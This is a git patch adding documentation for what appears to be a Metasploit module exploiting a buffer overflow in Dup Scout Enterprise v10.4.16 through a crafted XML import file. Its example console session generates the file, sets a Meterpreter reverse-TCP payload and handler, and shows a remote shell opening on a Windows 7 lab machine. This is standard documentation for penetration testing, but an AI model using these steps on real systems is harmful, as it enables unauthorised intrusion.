From c1ff0c1e002a42388589307ed2cdf688a1f056b2 Mon Sep 17 00:00:00 2001
From: Daniel Teixeira <DanielRTeixeira@users.noreply.github.com>
Date: Wed, 24 Jan 2018 20:47:02 +0000
Subject: [PATCH] Dup Scout XML documentation

---
 .../windows/fileformat/dupscout_xml.md        | 45 +++++++++++++++++++
 1 file changed, 45 insertions(+)
 create mode 100644 documentation/modules/exploit/windows/fileformat/dupscout_xml.md

diff --git a/documentation/modules/exploit/windows/fileformat/dupscout_xml.md b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md
new file mode 100644
index 0000000000..bd380838c0
--- /dev/null
+++ b/documentation/modules/exploit/windows/fileformat/dupscout_xml.md
@@ -0,0 +1,45 @@
+This module exploits a buffer overflow in Dup Scout Enterprise v10.4.16 by using the import command option to import a specially crafted xml file.
+
+## Vulnerable Application
+
+This module has been tested successfully on Windows 7 SP1. The vulnerable application is available for download at [www.dupscout.com](http://www.dupscout.com/setups/dupscoutent_setup_v10.4.16.exe).
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `exploit/windows/fileformat/dupscout_xml`
+3. Do: `set PAYLOAD [PAYLOAD]`
+4. Do: `run`
+
+## Example
+```
+msf > use exploit/windows/fileformat/dupscout_xml 
+msf exploit(windows/fileformat/dupscout_xml) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(windows/fileformat/dupscout_xml) > set LHOST 172.16.40.146 
+LHOST => 172.16.40.146
+msf exploit(windows/fileformat/dupscout_xml) > run
+
+[*] Creating 'msf.xml' file ...
+[+] msf.xml stored at /root/.msf4/local/msf.xml
+msf exploit(windows/fileformat/dupscout_xml) > use exploit/multi/handler 
+msf exploit(multi/handler) > set PAYLOAD windows/meterpreter/reverse_tcp
+PAYLOAD => windows/meterpreter/reverse_tcp
+msf exploit(multi/handler) > set LHOST 172.16.40.146 
+LHOST => 172.16.40.146
+msf exploit(multi/handler) > run
+
+[*] Started reverse TCP handler on 172.16.40.146:4444 
+[*] Sending stage (179779 bytes) to 172.16.40.144
+[*] Meterpreter session 1 opened (172.16.40.146:4444 -> 172.16.40.144:49790) at 2018-01-24 20:56:56 +0000
+
+meterpreter > sysinfo 
+Computer        : PC
+OS              : Windows 7 (Build 7601, Service Pack 1).
+Architecture    : x86
+System Language : pt_PT
+Domain          : WORKGROUP
+Logged On Users : 1
+Meterpreter     : x86/windows
+meterpreter > 
+```